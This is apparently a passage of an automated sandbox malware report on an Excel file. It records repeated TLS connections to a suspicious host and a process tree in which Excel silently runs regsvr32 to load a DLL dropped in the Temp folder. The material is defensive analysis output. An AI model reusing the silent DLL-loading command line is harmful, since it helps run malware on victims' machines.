                                                                                                                                                            Jan 12, 2021 07:41:51.841461897 CET77.220.64.37443192.168.2.2249386CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:53.904021025 CET77.220.64.37443192.168.2.2249390CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:55.980370045 CET77.220.64.37443192.168.2.2249394CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:41:58.081724882 CET77.220.64.37443192.168.2.2249398CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:42:00.176278114 CET77.220.64.37443192.168.2.2249402CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:42:02.247072935 CET77.220.64.37443192.168.2.2249406CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                                            Jan 12, 2021 07:42:04.306580067 CET77.220.64.37443192.168.2.2249410CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87

                                                                                                                                                            Code Manipulations

                                                                                                                                                            Statistics

                                                                                                                                                            Behavior

                                                                                                                                                            Click to jump to process

                                                                                                                                                            System Behavior

                                                                                                                                                            General

                                                                                                                                                            Start time:07:39:43
                                                                                                                                                            Start date:12/01/2021
                                                                                                                                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                            Imagebase:0x13fae0000
                                                                                                                                                            File size:27641504 bytes
                                                                                                                                                            MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:07:39:51
                                                                                                                                                            Start date:12/01/2021
                                                                                                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll.
                                                                                                                                                            Imagebase:0xff6e0000
                                                                                                                                                            File size:19456 bytes
                                                                                                                                                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:07:39:51
                                                                                                                                                            Start date:12/01/2021
                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline: -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll.
                                                                                                                                                            Imagebase:0xf80000
                                                                                                                                                            File size:14848 bytes
                                                                                                                                                            MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate

                                                                                                                                                            General

                                                                                                                                                            Start time:07:40:16
                                                                                                                                                            Start date:12/01/2021
                                                                                                                                                            Path:C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1488
                                                                                                                                                            Imagebase:0x13fc20000
                                                                                                                                                            File size:995024 bytes
                                                                                                                                                            MD5 hash:45A078B2967E0797360A2D4434C41DB4
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate

                                                                                                                                                            General

                                                                                                                                                            Start time:07:40:16
                                                                                                                                                            Start date:12/01/2021
                                                                                                                                                            Path:C:\Windows\System32\DWWIN.EXE
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\dwwin.exe -x -s 1488
                                                                                                                                                            Imagebase:0xff980000
                                                                                                                                                            File size:152576 bytes
                                                                                                                                                            MD5 hash:25247E3C4E7A7A73BAEEA6C0008952B1
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate

                                                                                                                                                            Disassembly

                                                                                                                                                            Code Analysis

                                                                                                                                                            Reset < >